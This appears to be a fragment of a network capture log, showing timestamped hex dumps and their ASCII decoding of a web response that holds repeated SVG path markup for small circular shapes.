                                                                                                                                                                              2023-09-15 05:27:44 UTC4435INData Raw: 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 33 34 2c 32 30 38 2e 36 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61
                                                                                                                                                                              Data Ascii: path class="cls-4" d="M700.34,208.66a1.71,1.71,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a
                                                                                                                                                                              2023-09-15 05:27:44 UTC4451INData Raw: 22 20 64 3d 22 4d 37 33 31 2e 38 31 2c 33 30 34 2e 37 37 41 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2c 37 33 31 2c 33 30 37 61 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                              Data Ascii: " d="M731.81,304.77A1.73,1.73,0,0,1,731,307a2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.5
                                                                                                                                                                              2023-09-15 05:27:44 UTC4467INData Raw: 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30
                                                                                                                                                                              Data Ascii: 3,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0
                                                                                                                                                                              2023-09-15 05:27:44 UTC4483INData Raw: 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 38 38 2c 32 39 36 2e 31 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38
                                                                                                                                                                              Data Ascii: 1-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M780.88,296.17a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M78
                                                                                                                                                                              2023-09-15 05:27:44 UTC4499INData Raw: 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 37 33 2c 31 39 38 2e 33 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c
                                                                                                                                                                              Data Ascii: ,0,0,1,.15,2.86"></path><path class="cls-4" d="M798.73,198.39a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,
                                                                                                                                                                              2023-09-15 05:27:44 UTC4515INData Raw: 64 3d 22 4d 38 33 30 2e 31 39 2c 32 39 34 2e 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 35 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                              Data Ascii: d="M830.19,294.5a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.95,2.38,2.38,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.
                                                                                                                                                                              2023-09-15 05:27:44 UTC4531INData Raw: 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e
                                                                                                                                                                              Data Ascii: .72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.
                                                                                                                                                                              2023-09-15 05:27:48 UTC4547INData Raw: 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70
                                                                                                                                                                              Data Ascii: ,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></p
                                                                                                                                                                              2023-09-15 05:27:48 UTC4563INData Raw: 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 37 2e 31 32 2c 31 38 38 2e 31 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c
                                                                                                                                                                              Data Ascii: 2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M897.12,188.12a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,
                                                                                                                                                                              2023-09-15 05:27:48 UTC4579INData Raw: 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 35 38 2c 32 38 34 2e 32 33 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35
                                                                                                                                                                              Data Ascii: 11,0,0,1,.15,2.85"></path><path class="cls-4" d="M928.58,284.23a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.5
                                                                                                                                                                              2023-09-15 05:27:48 UTC4595INData Raw: 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                              Data Ascii: .69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2
                                                                                                                                                                              2023-09-15 05:27:48 UTC4611INData Raw: 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                              Data Ascii: ,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path
                                                                                                                                                                              2023-09-15 05:27:48 UTC4627INData Raw: 2e 35 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: .59a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1
                                                                                                                                                                              2023-09-15 05:27:48 UTC4643INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 35 39 2c 32 32 37 2e 35 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c
                                                                                                                                                                              Data Ascii: th><path class="cls-4" d="M959.59,227.54a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,
                                                                                                                                                                              2023-09-15 05:27:48 UTC4659INData Raw: 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 30 36 2c 31 34 36 2e 35 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32
                                                                                                                                                                              Data Ascii: 08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.06,146.54a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2
                                                                                                                                                                              2023-09-15 05:27:48 UTC4675INData Raw: 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2c 32 35 36 2e 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c
                                                                                                                                                                              Data Ascii: ,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912,256.5a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,
                                                                                                                                                                              2023-09-15 05:27:48 UTC4691INData Raw: 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                              Data Ascii: ,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path cla
